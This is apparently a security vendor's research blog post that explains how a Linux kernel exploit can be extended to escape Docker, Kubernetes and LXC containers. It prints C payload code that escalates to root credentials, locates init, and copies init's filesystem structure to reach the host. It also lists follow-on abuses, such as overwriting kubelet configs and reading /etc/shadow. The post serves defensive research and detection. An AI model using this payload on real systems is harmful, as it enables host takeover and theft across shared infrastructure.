You Think That’s Air You’re Breathing?

An Exercise in Practical Container Escapology

Introduction

Containerization has revolutionized how software is developed and deployed, by providing powerful specificity and control for devs and ops alike. By isolating software environments and interactions, containers categorically eliminate a variety problems which have historically plagued the software development process, such as dependency conflicts and name collisions. Containers also provide some security properties, including version management, an expression of intent, and often reduced attack surface. However, it is important to understand that although the organizational isolation of containers is what enables these security properties, isolation itself is not a security property of containers.

As the use of containers in production Linux environments continues to increase, so does the interest in how the technology responsible for containers can be used and abused to break free from the confines of a container. Recently there was a fair amount of hype surrounding the vulnerability in runc, and for good reason: getting out of the container gives the attacker much broader access to a host, enabling interaction with other containers, and the ability to view and modify configurations. But what seemed lost in this hype is that the ability to escape containers is not confined to a one-off vulnerability in container management programs or orchestrators.

Simply put, containers are just processes, and as such they are governed by the kernel like any other process. Thus any kernel-land vulnerability which yields arbitrary code execution can be exploited to escape a container. To demonstrate this, Capsule8 Labs has created an exploit that removes the process from its confines and gives it root access in the Real World. Let’s take a look at what was involved.

Requirements

Like most (but not all!) privilege escalation exploits that target Linux, the first thing we need is a kernel vulnerability. These are found and patched on a regular basis, and from time to time, a proof of concept exploit is released that demonstrates the impact of the issue. For the purposes of this post, we are going to use a combination of two vulnerabilities that were discovered and exploited by Andrey Konovalov, a Googler who regularly shares vulnerabilities he finds, along with exploit code. Thanks, Andrey! We use the first vulnerability as our ASLR bypass, as the method included in the second PoC exploit is unreliable if the target system has a high uptime.

We selected these two vulnerabilities as an example of a scenario where SMEP/SMAP can be disabled, and subsequently the kernel can be made to execute user-controlled code from a userland process (which is effectively like having shellcode that can be written in C). A full write-up on the mechanism used by these exploits to get us to this point of the kernel executing userland code is beyond the scope of this post. The purpose of this post is to describe how once any given kernel exploit reaches this point, a payload can be applied to escape a container.

Relevant Structures

In reality, very little separates a process from being in or out of a container. Furthermore, you don’t need to play with namespaces in order to escape the container’s confines and interact with the host. It can come down to as little as interacting with the following data structures:

task_struct

This struct is the guts of a process in the kernel, and it holds a few things we care about:

  • pid number of the task, which in kernel-land is better thought of as a user-land thread ID
  • real_parent: a pointer to the task_struct of the parent task. We loop over this pointer and interrogate the parent’s pid in order to find find PID 1 – the PID belonging to init.
  • fs_struct: a pointer to a structure describing the filesystem where task is operating

fs_struct

This defines the root directory and present working directory for the task. We can copy this over from another process that is not in a container in order to have our task point at a directory in the host file system. By copying init‘s fs_struct, we can be sure to land in the root directory of the host. To do this, we call the copy_fs_struct kernel function, as it appropriately handles the accounting work of locking and updating the reference count to the underlying members of the fs_struct.

Breaking out

When it comes to actually breaking out, a few things need to happen. We need to:

  1. Escalate to root – Set the credentials of our task to that of root – ensuring we are actually root once we break out.
  2. Find init – Find the task_struct for PID 1, the init process – we want to copy a lot of its data to our own task.
  3. Copy filesystem info – Copy the fs_struct information from init‘s structs to ours
  4. Execute a root shell – Execute /bin/bash to drop us into a root shell.

Of the four steps above, 2 and 3 are specific to our container escape exploit. The crux of our changes are shown below, highlighted in blue and red. We have added one function named get_task(), which gets the value of current (a pointer to our task’s task_struct). The code in black was in the original exploit, available here.

typedef unsigned long __attribute__((regparm(3))) (*_copy_fs_struct)(unsigned long init_task);

uint64_t get_task(void) {
    uint64_t task;
    asm volatile ("movq %%gs: 0xD380, %0":"=r"(task));
    return task;
}

void get_root(void) {

    int i;
    char *task;
    char *init;
    uint32_t pid = 0;


	((_commit_creds)(COMMIT_CREDS))(
	    ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));


    task = (char *)get_task();
    init = task;
    while (pid != 1) {
        init = *(char **)(init + TASK_REAL_PARENT_OFFSET);
        pid = *(uint32_t *)(init + TASK_PID_OFFSET);
    }

  
    *(uint64_t *)(task + TASK_FS_OFFSET) = ((_copy_fs_struct)(COPY_FS_STRUCT))(*(long unsigned int *)(init + TASK_FS_OFFSET));
}

Secondly, we altered the get_root() function already present in Andrey’s POC for CVE-2017-1000112. There are two main changes here:

  • We traverse up the process’ lineage through the real_parent pointer in the task_struct to find the task_struct of init (PID 1)
  • We copy init‘s fs_struct to our task to ensure our new shell has access to the host filesystem.

It’s worth noting that the kernel functions prepare_kernel_cred and commit_creds that are used by the exploit to get root credentials will also end up specifying our task’s user-namespace to be that of the host, however this isn’t actually a change in Docker containers, as by default Docker containers run in the host’s user-namespace.

Full code to modified exploit to escape the container is available here. Check out the exploit in action below!

In the video, we can see that inside the container as the ubuntu user, we have a limited view of processes, and indeed the /proc directory is owned by nobody/nogroup – and indication that we are in an unprivileged container. After running the exploit, our prompt still shows us as being inside the ubuntu_lxc_usr container, however we now have access to the overall host’s file system – we can list processes from outside our container and read the /etc/shadow file, which contains entries from the host and not the container. From this point, there’s no necessity to even bother with changing namespaces, you have free rein to:

  • Write or overwrite host or other container files (including kubelet configs)
  • Interact with Docker (perhaps pull and launch a new fun privileged container)
  • Inject code or harvest data from processes (host or container) via /proc/pid/mem
  • Load / unload kernel modules

Our exploit has been tested against Ubuntu kernel 4.8.0-34-generic, with containers running in Kubernetes with Docker, and unprivileged containers in a local LXC deployment. Note that you will need to find your own function and struct offsets if you’re trying this for a different kernel version.

Conclusion

The rules governing containers are the same as any other process: some can be bent, and others can be broken. Vulnerabilities and misconfigurations in container-management programs are not the only means by which an attacker can escape a container. And while the security properties of containers should be celebrated, the isolation of container processes should not be treated as a security boundary. This is why it is important to have detection of kernel exploitation in your strategy for defense. Capsule8 provides exploitation detection out-of-the-box, identifying container-escapes and other kernel malfeasance.

The Capsule8 Labs team conducts offensive and defensive research to understand the threat landscape for modern infrastructure and to continuously improve Capsule8’s attack coverage.